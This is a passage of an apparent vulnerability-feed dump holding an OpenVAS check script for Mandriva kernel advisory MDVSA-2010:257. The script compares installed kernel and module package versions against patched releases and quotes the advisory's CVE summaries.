rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-desktop586-latest\", rpm:\"vpnclient-kernel-desktop586-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-desktop-latest\", rpm:\"vpnclient-kernel-desktop-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-server-latest\", rpm:\"vpnclient-kernel-server-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel\", rpm:\"nvidia173-kernel~2.6.27.56~server~1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel-server-latest\", rpm:\"nvidia173-kernel-server-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:28", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-01-04T00:00:00", "type": "openvas", "title": "Mandriva Update for kernel MDVSA-2010:257 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2963", "CVE-2010-3850", "CVE-2010-3442", "CVE-2010-3848", "CVE-2010-2240", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-3849"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831290", "href": "http://plugins.openvas.org/nasl.php?oid=831290", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for kernel MDVSA-2010:257 (kernel)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in the Linux 2.6 kernel:\n\n The setup_arg_pages function in fs/exec.c in the Linux kernel before\n 2.6.36, when CONFIG_STACK_GROWSDOWN is used, does not properly restrict\n the stack memory consumption of the (1) arguments and (2) environment\n for a 32-bit application on a 64-bit platform, which allows local\n users to cause a denial of service (system crash) via a crafted exec\n system call, a related issue to CVE-2010-2240. (CVE-2010-3858)\n \n drivers/media/video/v4l2-compat-ioctl32.c in the Video4Linux (V4L)\n implementation in the Linux kernel before 2.6.36 on 64-bit platforms\n does not validate the destination of a memory copy operation, which\n allows local users to write to arbitrary kernel memory locations,\n and consequently gain privileges, via a VIDIOCSTUNER ioctl call on a\n /dev/video device, followed by a VIDIOCSMICROCODE ioctl call on this\n device. (CVE-2010-2963)\n \n Integer overflow in the do_io_submit function in fs/aio.c in the\n Linux kernel before 2.6.36-rc4-next-20100915 allows local users to\n cause a denial of service or possibly have unspecified other impact\n via crafted use of the io_submit system call. (CVE-2010-3067)\n \n Multiple integer overflows in the snd_ctl_new function\n in sound/core/control.c in the Linux kernel before\n 2.6.36-rc5-next-20100929 allow local users to cause a denial of\n service (heap memory corruption) or possibly have unspecified\n other impact via a crafted (1) SNDRV_CTL_IOCTL_ELEM_ADD or (2)\n SNDRV_CTL_IOCTL_ELEM_REPLACE ioctl call. (CVE-2010-3442)\n \n A kernel stack overflow, a bad pointer dereference and a missing\n permission check were corrected in the econet implementation\n (CVE-2010-3848) (CVE-2010-3849) (CVE-2010-3850).\n \n Additionally, the kernel has been updated to the stable upstream\n version 2.6.27.56.\n \n To update your kernel, please follow the directions located at:\n \n http://www.mandriva.com/en/security/kernelupdate\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"kernel on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-12/msg00018.php\");\n script_id(831290);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-04 09:11:34 +0100 (Tue, 04 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2010:257\");\n script_cve_id(\"CVE-2010-2240\", \"CVE-2010-3858\", \"CVE-2010-2963\", \"CVE-2010-3067\", \"CVE-2010-3442\", \"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\");\n script_name(\"Mandriva Update for kernel MDVSA-2010:257 (kernel)\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel\", rpm:\"drm-experimental-kernel~2.6.27.56~desktop~1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"drm-experimental-kernel-2.6.27.56-desktop586-1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel-2.6.27.56-server\", rpm:\"drm-experimental-kernel-2.6.27.56-server~1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel-desktop586-latest\", rpm:\"drm-experimental-kernel-desktop586-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel-desktop-latest\", rpm:\"drm-experimental-kernel-desktop-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel-server-latest\", rpm:\"drm-experimental-kernel-server-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-2.6.27.56-desktop-1mn\", rpm:\"fglrx-kernel-2.6.27.56-desktop-1mnb~8.522~3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"fglrx-kernel-2.6.27.56-desktop586-1mnb~8.522~3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-2.6.27.56-server\", rpm:\"fglrx-kernel-2.6.27.56-server~1mnb~8.522~3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-desktop586-latest\", rpm:\"fglrx-kernel-desktop586-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-desktop-latest\", rpm:\"fglrx-kernel-desktop-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-server-latest\", rpm:\"fglrx-kernel-server-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel\", rpm:\"iscsitarget-kernel~2.6.27.56~desktop~1mnb~0.4.16~4.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"iscsitarget-kernel-2.6.27.56-desktop586-1mnb~0.4.16~4.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel-2.6.27.56-server\", rpm:\"iscsitarget-kernel-2.6.27.56-server~1mnb~0.4.16~4.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel-desktop586-latest\", rpm:\"iscsitarget-kernel-desktop586-latest~0.4.16~1.20101216.4.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel-desktop-latest\", rpm:\"iscsitarget-kernel-desktop-latest~0.4.16~1.20101216.4.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel-server-latest\", rpm:\"iscsitarget-kernel-server-latest~0.4.16~1.20101216.4.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop586\", rpm:\"kernel-desktop586~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop586-devel\", rpm:\"kernel-desktop586-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop586-devel-latest\", rpm:\"kernel-desktop586-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop586-latest\", rpm:\"kernel-desktop586-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel-latest\", rpm:\"kernel-desktop-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-latest\", rpm:\"kernel-desktop-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-server\", rpm:\"kernel-server~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-server-devel\", rpm:\"kernel-server-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-server-devel-latest\", rpm:\"kernel-server-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-server-latest\", rpm:\"kernel-server-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-latest\", rpm:\"kernel-source-latest~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel\", rpm:\"kqemu-kernel~2.6.27.56~desktop~1mnb~1.4.0pre1~0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"kqemu-kernel-2.6.27.56-desktop586-1mnb~1.4.0pre1~0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel-2.6.27.56-server~1mnb\", rpm:\"kqemu-kernel-2.6.27.56-server~1mnb~1.4.0pre1~0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel-desktop586-latest\", rpm:\"kqemu-kernel-desktop586-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel-desktop-latest\", rpm:\"kqemu-kernel-desktop-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel-server-latest\", rpm:\"kqemu-kernel-server-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libafs-kernel\", rpm:\"libafs-kernel~2.6.27.56~desktop~1mnb~1.4.7~5.2mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libafs-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"libafs-kernel-2.6.27.56-desktop586-1mnb~1.4.7~5.2mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libafs-kernel-2.6.27.56-server-1mnb\", rpm:\"libafs-kernel-2.6.27.56-server-1mnb~1.4.7~5.2mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libafs-kernel-desktop586-latest\", rpm:\"libafs-kernel-desktop586-latest~1.4.7~1.20101216.5.2mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libafs-kernel-desktop-latest\", rpm:\"libafs-kernel-desktop-latest~1.4.7~1.20101216.5.2mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libafs-kernel-server-latest\", rpm:\"libafs-kernel-server-latest~1.4.7~1.20101216.5.2mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel\", rpm:\"madwifi-kernel~2.6.27.56~desktop~1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"madwifi-kernel-2.6.27.56-desktop586-1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel-2.6.27.56-server\", rpm:\"madwifi-kernel-2.6.27.56-server~1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel-desktop586-latest\", rpm:\"madwifi-kernel-desktop586-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel-desktop-latest\", rpm:\"madwifi-kernel-desktop-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel-server-latest\", rpm:\"madwifi-kernel-server-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel\", rpm:\"nvidia173-kernel~2.6.27.56~desktop~1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia173-kernel-2.6.27.56-desktop586-1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel-desktop586-latest\", rpm:\"nvidia173-kernel-desktop586-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel-desktop-latest\", rpm:\"nvidia173-kernel-desktop-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel\", rpm:\"nvidia71xx-kernel~2.6.27.56~desktop~1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia71xx-kernel-2.6.27.56-desktop586-1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel-2.6.27.56-server-1mnb\", rpm:\"nvidia71xx-kernel-2.6.27.56-server-1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel-desktop586-latest\", rpm:\"nvidia71xx-kernel-desktop586-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel-desktop-latest\", rpm:\"nvidia71xx-kernel-desktop-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel-server-latest\", rpm:\"nvidia71xx-kernel-server-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel\", rpm:\"nvidia96xx-kernel~2.6.27.56~desktop~1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia96xx-kernel-2.6.27.56-desktop586-1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-2.6.27.56-server-1mnb\", rpm:\"nvidia96xx-kernel-2.6.27.56-server-1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-desktop586-latest\", rpm:\"nvidia96xx-kernel-desktop586-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-desktop-latest\", rpm:\"nvidia96xx-kernel-desktop-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-server-latest\", rpm:\"nvidia96xx-kernel-server-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-desktop-1mnb\", rpm:\"nvidia-current-kernel-2.6.27.56-desktop-1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel\", rpm:\"nvidia-current-kernel~2.6.27.56~server~1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop586-latest\", rpm:\"nvidia-current-kernel-desktop586-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop-latest\", rpm:\"nvidia-current-kernel-desktop-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-server-latest\", rpm:\"nvidia-current-kernel-server-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel\", rpm:\"vpnclient-kernel~2.6.27.56~desktop~1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-server-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-server-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-desktop586-latest\", rpm:\"vpnclient-kernel-desktop586-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-desktop-latest\", rpm:\"vpnclient-kernel-desktop-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vpnclient-kernel-server-latest\", rpm:\"vpnclient-kernel-server-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.56~1mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libafs-kernel\", rpm:\"libafs-kernel~2.6.27.56~desktop~1mnb~1.4.7~5.1mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libafs-kernel-2.6.27.56-server-1mnb\", rpm:\"libafs-kernel-2.6.27.56-server-1mnb~1.4.7~5.1mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libafs-kernel-desktop-latest\", rpm:\"libafs-kernel-desktop-latest~1.4.7~1.20101216.5.1mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libafs-kernel-server-latest\", rpm:\"libafs-kernel-server-latest~1.4.7~1.20101216.5.1mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel\", rpm:\"nvidia173-kernel~2.6.27.56~server~1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel-server-latest\", rpm:\"nvidia173-kernel-server-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"alsa_raoppcm-kernel\", rpm:\"alsa_raoppcm-kernel~2.6.27.56~desktop~1mnb~0.5.1~2mdv2008.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"alsa_raoppcm-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"alsa_raoppcm-kernel-2.6.27.56-desktop586-1mnb~0.5.1~2mdv2008.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 